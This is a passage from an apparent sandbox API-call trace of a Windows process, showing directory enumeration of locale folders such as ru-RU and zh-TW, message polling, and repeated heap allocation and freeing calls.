returned 0x2ad7770 [0183.226] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0183.226] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x2adf6e8 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ae0 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b58 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a68 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7db0 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d88 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d60 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d38 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d10 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ce8 [0183.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7cc0 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c98 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c70 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c48 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c20 [0183.227] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7770 [0183.227] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b80 [0183.227] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0183.227] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.227] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0183.227] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.228] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0183.228] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0183.231] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.232] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.248] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.248] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: 